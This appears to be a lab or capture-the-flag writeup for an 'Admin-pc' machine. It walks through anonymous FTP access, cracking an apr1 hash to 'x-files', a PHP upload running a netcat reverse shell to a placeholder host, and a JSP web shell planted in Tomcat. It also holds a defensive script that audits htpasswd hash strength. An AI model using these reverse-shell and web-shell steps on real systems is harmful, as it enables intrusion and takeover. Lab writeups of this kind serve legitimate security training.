Admin-pc machine writeup
Exploitation
Scan the machine using
nmap 192.168.x.55 -A
One interesting part is the FTP service output:
21/tcp open ftp syn-ack ttl 128
| fingerprint-strings:
| GenericLines:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| command not understood.
| command not understood.
| Help:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| 'HELP': command not understood.
| NULL, SMBProgNeg:
| 220-Wellcome to Home Ftp Server!
|_ Server ready.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeabl
|_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeab
Connect to the server and get the XAMPP config file.
Use user anonymous with any password.
The file contains the credentials:
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack the password and you will get the plaintext:
fm:x-files
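An added example, not part of the original writeup: a defender-side audit of htpasswd-style credential files that flags entries like the fm line above, whose $apr1$ (salted MD5) scheme is a fast hash that makes offline guessing cheap. The function names, the bcrypt cost threshold and every sample entry other than the fm line are assumptions constructed for illustration.

```python
import re

MIN_BCRYPT_COST = 10  # assumption: threshold chosen for this example

# (pattern, scheme, acceptable, reason) for hash formats htpasswd files can hold
SCHEMES = [
    (re.compile(r"^\$2[aby]\$(\d{2})\$"), "bcrypt", True, "adaptive cost"),
    (re.compile(r"^\$apr1\$"), "apr1-md5", False, "salted MD5, fixed 1000 rounds"),
    (re.compile(r"^\{SHA\}"), "sha1", False, "unsalted single SHA-1"),
    # 13 crypt-alphabet chars; a 13-char plaintext would also match this shape
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "des-crypt", False, "8-char limit, 12-bit salt"),
]

def classify(hash_field):
    """Return (scheme, acceptable, reason) for one hash field."""
    for pattern, name, ok, reason in SCHEMES:
        m = pattern.match(hash_field)
        if m:
            if name == "bcrypt" and int(m.group(1)) < MIN_BCRYPT_COST:
                return name, False, f"cost {int(m.group(1))} below {MIN_BCRYPT_COST}"
            return name, ok, reason
    return "plaintext-or-unknown", False, "not a recognised hash format"

def audit_htpasswd(text):
    """Return (line_no, user, scheme, acceptable, reason) per entry."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep:
            findings.append((line_no, line, "malformed", False, "no ':' separator"))
            continue
        findings.append((line_no, user, *classify(hash_field)))
    return findings

# First entry is the one from the writeup; the rest are constructed placeholders
# (not real hashes) that only exercise the format checks.
SAMPLE = "\n".join([
    "fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1",
    "backup:$2y$12$" + "A" * 53,
    "deploy:$2y$05$" + "A" * 53,
    "legacy:{SHA}" + "A" * 27 + "=",
    "guest:letmein",
])

if __name__ == "__main__":
    for line_no, user, scheme, ok, reason in audit_htpasswd(SAMPLE):
        print(f"line {line_no}: {user:<7} {scheme:<20} {'ok' if ok else 'WEAK'}  ({reason})")
```

A stronger hash scheme only slows guessing; the file also has to be kept out of directories served over FTP or HTTP.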
Now connect to
192.168.x.55:10433/admin
which is a file manager that allows uploading executable files.
Upload netcat.exe, then upload a PHP file including system('nc -vv YOUR_HOST 443 -e cmd.exe'); to gain shell access.
Escalation
Upload a JSP shell file to c:/xampp/tomcat/webapps/examples
then browse to it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami
And you're an admin.
[root:~/Desktop]# ftp
ftp> o
(to) 192.168.x.55
Connected to 192.168.x.55.
220-Wellcome to Home Ftp Server!
220 Server ready.
Name (192.168.x.55:root): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.